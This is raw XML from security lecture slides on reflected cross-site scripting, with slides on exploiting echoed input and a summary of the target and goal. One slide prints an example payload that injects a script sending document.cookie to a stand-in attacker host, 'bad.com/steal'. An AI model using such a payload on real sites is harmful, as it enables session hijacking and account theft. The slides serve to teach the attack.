            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="381000"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="109441">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="31" dirty="0"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="114" dirty="0"/>
              <a:t>echoed</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-74" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="67" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172035" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C810FC-2F94-E24C-B500-9FC24DC8C7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="2027238"/>
            <a:ext cx="5508625" cy="1944687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="21391" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="381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525"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="163"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2100" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2513"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>“http://bad.com/steal?c=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+	document.cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2525"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172036" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9859BEE-61F3-7740-A625-FD69A70FCB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1411288" y="5037138"/>
            <a:ext cx="7235825" cy="1973262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 9354185"/>
              <a:gd name="T1" fmla="*/ 0 h 2476500"/>
              <a:gd name="T2" fmla="*/ 42571 w 9354185"/>
              <a:gd name="T3" fmla="*/ 0 h 2476500"/>
              <a:gd name="T4" fmla="*/ 42571 w 9354185"/>
              <a:gd name="T5" fmla="*/ 20995 h 2476500"/>
              <a:gd name="T6" fmla="*/ 0 w 9354185"/>
              <a:gd name="T7" fmla="*/ 20995 h 2476500"/>
              <a:gd name="T8" fmla="*/ 0 w 9354185"/>
              <a:gd name="T9" fmla="*/ 0 h 2476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4185" h="2476500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9353778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9353778" y="2476500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24765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 name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA77DF1A-2E7C-9245-8B21-DD169973C3D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="5073650"/>
            <a:ext cx="1277938" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE86FB28-7D15-9241-9C12-C61D5312CE07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4205288" y="5073650"/>
            <a:ext cx="4202112" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="2775821" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Searc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>h results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F16925F-6004-654A-8C41-B3FC3DAF4ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463675" y="5073650"/>
            <a:ext cx="2009775" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2906"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2899"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="102"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;body&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-74" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172040" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ECB0B91-F4FE-6A42-B28D-D1850497A13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1463675" y="6196013"/>
            <a:ext cx="2557463"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tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775"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tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="020002"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.	.	.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E7D133-270A-434C-8977-9CDA86CC85A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3525838" y="1508125"/>
            <a:ext cx="4627562" cy="430213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-51" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bad.com:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE9C091-CEFB-074A-829D-A6F7ACF14067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300413" y="4522788"/>
            <a:ext cx="4852987" cy="430212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>victim.com:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9C14F46-956B-C84A-98F3-92A8CD228F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="7162800"/>
            <a:ext cx="8342313" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Browser would execute this within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" spc="-12" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>victim.com’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" spc="16" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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1DB6A39-AD4C-CE43-94C2-C39E5E14EFE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15847" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="45" dirty="0"/>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-330" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-20" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F938AF51-164A-C440-B798-A161B0E603A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2351088"/>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73060" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD3CDEC-D82D-A546-9389-C177B6792E26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2303463"/>
            <a:ext cx="79565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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: User with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Javascript-enabled browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; vulnerable  web service that includes parts of URLs it receives in the  output it generates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944CE73B-DDE3-1848-A965-A2F5DDFB88C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3805238"/>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73062" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{723E97D5-FA54-764A-9974-0D4A88BDC105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3779838"/>
            <a:ext cx="819467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800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Run script in user’s browser with same access  as provided to server’s regular scripts (subvert SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
